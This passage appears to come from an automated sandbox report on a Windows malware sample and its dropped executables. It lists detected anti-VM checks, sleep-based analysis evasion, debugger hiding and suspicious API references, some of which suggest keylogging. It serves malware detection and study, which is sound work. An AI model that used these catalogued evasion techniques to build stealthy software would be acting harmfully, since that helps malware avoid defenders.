Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: 0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2214696760.0000000002B4B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2383386591.0000000002191000.00000004.00000001.sdmp, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_BIOS
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FF00280EFC sldt word ptr [eax] 7_2_000007FF00280EFC
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\sp.exe Window / User API: threadDelayed 3171 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Window / User API: threadDelayed 9387
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2112 Thread sleep time: -31500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1108 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2312 Thread sleep time: -430000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072 Thread sleep count: 3171 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1072 Thread sleep time: -31710s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2900 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2860 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 2948 Thread sleep count: 254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe TID: 1872 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 1316 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3068 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 820 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 3028 Thread sleep time: -420000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 2172 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912 Thread sleep count: 9387 > 30
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe TID: 912 Thread sleep count: 249 > 30
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 648 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2040 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\sp.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\sp.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Roaming\sp.exe Thread sleep count: Count: 3171 delay: -10 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 28_2_00426F7A
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_005C7F30 FindFirstFileW,GetLastError, 28_2_005C7F30
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo, 28_2_0044A238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000 28_2_00478772
Hides threads from debuggers
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0058E501 IsDebuggerPresent,OutputDebugStringW, 28_2_0058E501
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_004F2AA7
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0069B53C mov eax, dword ptr fs:[00000030h] 28_2_0069B53C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004AABEB GetProcessHeap,HeapFree, 28_2_004AABEB
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_006814DA
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_0068B781
Source: C:\Users\user\AppData\Roaming\sp.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
.NET source code references suspicious native API functions
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???uf871???????????ufffd??ufffd?.cs Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ua8fa?uf866???ufffd???u323bu1377???u24a3?.cs Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
